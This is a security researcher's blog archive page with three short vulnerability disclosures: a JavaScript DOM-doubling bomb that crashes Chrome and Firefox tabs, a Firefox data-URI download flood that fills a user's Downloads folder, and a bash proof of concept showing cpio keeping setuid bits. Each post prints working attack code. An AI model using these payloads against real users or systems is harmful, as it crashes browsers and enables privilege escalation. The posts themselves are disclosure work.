January 2024 Archives

Thu 25 Jan 2024 10:50:26 AM EET

Yet another fork()/malloc() bomb in javascript + SIGILL in Chrome

Yet another fork()/malloc() bomb in javascript + SIGILL in Chrome

Searching the web for javascript fork malloc bomb returns results, e.g. here: and here:

We got a javascript fork malloc bomb which crashed Chrome 121 on linux with SIGILL and about one in five runs the virtual machine freezes. SIGILL almost always is a sign of memory corruption :) On android it crashes the current tab without explanation. Firefox 121 on linux also crashes the current tab.

In all cases except the sporadic freezes, the browser remains functioning, not counting the crashed tab.

The javscript code is simply simple:

setInterval("document.body.innerHTML += document.body.innerHTML ",1);

Online demo: In case someone wants to test it on other browsers or debug.

The GNU/linux tests took about 1.5 minutes in a virtual machine with 4GB RAM and single core.


Posted by guninski | Permanent link

Thu 18 Jan 2024 11:37:09 AM EET

Minor firefox DoS - semi silently polluting ~/Downloads with files (part 2)

Minor firefox DoS - semi silently polluting ~/Downloads with files (part 2)

Tested on: firefox 121 and chrome 120 on GNU/linux

Date: Thu Jan 18 08:38:28 AM UTC 2024

This is barely a DoS, but since it might affect Chrome too we decided to disclose it.

If firefox user visits a specially crafted page, then firefox may create many files in ~/Downloads, The user is notified about this in a small dialog, but there is no option to stop the downloads. The potential denial of service is that the user must manually delete the created files and this might be PITA especially on a phone.

The code basically is:

URL = "data:text/plain;,a";//can be very large with no net traffic
link = document.createElement('a');
link.href = URL;
link.download = 'joro_';
document.body.appendChild(link);
function f() {
if( !confirm("This will ruin your device with probability up to 199.99%")) 
    return;
setInterval("link.click();",1);//dobro
}
f();

There is no network traffic and in about 90 seconds firefox 121 created 3434 files at speed about 38 files/second.

google chrome 120 prompts about multiple downloads, and if the user allows it, it creates files at speed of 4.2 files/second, but it gives modal prompts, which we couldn’t close from the GUI and had to kill the process.

Test online: if you are vulnerable

– guninski


Posted by joro | Permanent link

Mon 08 Jan 2024 10:57:17 AM EET

cpio privilege escalation via setuid files in cpio archive

cpio privilege escalation via setuid files in cpio archive

Happy New Year, let in 2024 happiness be with you! :)

When extracting archives cpio (at least version 2.13) preserves the setuid flag, which might lead to privilege escalation.

One example is r00t extracts to /tmp/ and scidiot runs /tmp/micq/backd00r without further interaction from root.

We believe this is vulnerability, since directory traversal in cpio is considered vulnerability.

The POC is trivial, including bash script.

====
#!/bin/bash
# cpio privilege escalation via setuid files in cpio archive
# author: Georgi Guninski 
# date: Mon Jan  8 07:28:28 AM UTC 2024
# tested on cpio (GNU cpio) 2.13

mkdir -p /tmp/1
cd /tmp/1
touch a
chmod 4555 a
echo -n a | cpio -ocv0  > a.cpio
mkdir -p /tmp/2
cd /tmp/2
cpio -iv < ../1/a.cpio
ls -lh /tmp/2/a 
#-r-sr-xr-x. 1 joro joro 0 Jan  8 09:10 /tmp/2/a
====

Posted by 2024 | Permanent link
/\